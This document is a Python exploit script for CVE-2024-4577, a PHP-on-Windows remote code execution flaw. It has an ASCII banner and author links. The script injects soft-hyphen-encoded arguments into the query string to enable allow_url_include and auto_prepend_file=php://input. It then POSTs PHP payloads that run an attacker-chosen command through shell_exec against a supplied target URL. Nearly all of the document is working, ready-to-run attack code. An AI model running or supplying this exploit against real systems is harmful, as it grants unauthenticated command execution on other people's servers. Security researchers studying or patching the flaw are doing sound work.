# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.php.net/downloads.php # Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29 # CVE : CVE-2024-4577 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py ''') def exploit(url, command): payloads = { '<?php echo "vulnerable"; ?>', '<?php echo shell_exec("'+command+'"); ?>' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'Content-Type': 'application/x-www-form-urlencoded'} s = Session() for payload in payloads: url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" req = Request('POST', url, data=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) #print(prepped.headers) #print(url) #print(resp.headers) #print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])